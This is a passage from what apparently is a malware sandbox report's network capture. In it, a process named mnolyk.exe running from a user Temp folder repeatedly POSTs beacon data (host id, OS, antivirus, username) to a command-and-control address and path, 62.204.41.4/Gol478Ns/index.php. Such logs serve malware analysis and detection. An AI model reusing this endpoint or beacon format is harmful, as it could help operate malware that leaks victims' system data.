                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.888216972 CET | 234 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    330 | 192.168.2.3 | 50032 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:52.345278025 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.410057068 CET | 530 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    331 | 192.168.2.3 | 50033 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:52.676521063 CET | 531 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.740345955 CET | 531 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    332 | 192.168.2.3 | 50034 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:53.871279955 CET | 532 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:53.936458111 CET | 532 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    333 | 192.168.2.3 | 50036 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:58.338478088 CET | 533 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.404299974 CET | 534 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    334 | 192.168.2.3 | 50037 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:58.577469110 CET | 534 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.642394066 CET | 535 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    335 | 192.168.2.3 | 50038 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:58.827244997 CET | 535 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.893783092 CET | 536 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    336 | 192.168.2.3 | 50039 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:59.074009895 CET | 536 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.139018059 CET | 537 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    337 | 192.168.2.3 | 50040 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:59.306914091 CET | 537 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.370630026 CET | 538 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    338 | 192.168.2.3 | 50041 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:59.543687105 CET | 538 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.609154940 CET | 539 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    339 | 192.168.2.3 | 50042 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:59.788041115 CET | 539 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.851001978 CET | 539 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    34 | 192.168.2.3 | 49736 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:25.096772909 CET | 235 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.163085938 CET | 235 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    340 | 192.168.2.3 | 50043 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:00.026149035 CET | 540 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.090549946 CET | 540 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    341 | 192.168.2.3 | 50044 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:00.262908936 CET | 541 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.326045036 CET | 541 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    342 | 192.168.2.3 | 50045 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:00.500794888 CET | 542 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.566679001 CET | 542 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    343 | 192.168.2.3 | 50046 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:00.777060986 CET | 543 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.848515034 CET | 543 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    344 | 192.168.2.3 | 50047 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:01.026819944 CET | 544 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.091001987 CET | 544 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    345 | 192.168.2.3 | 50048 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:01.267354012 CET | 545 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.332395077 CET | 545 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    346 | 192.168.2.3 | 50049 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:01.511260033 CET | 546 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:01.573685884 CET | 546 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    347 | 192.168.2.3 | 50050 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:01.748836040 CET | 547 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
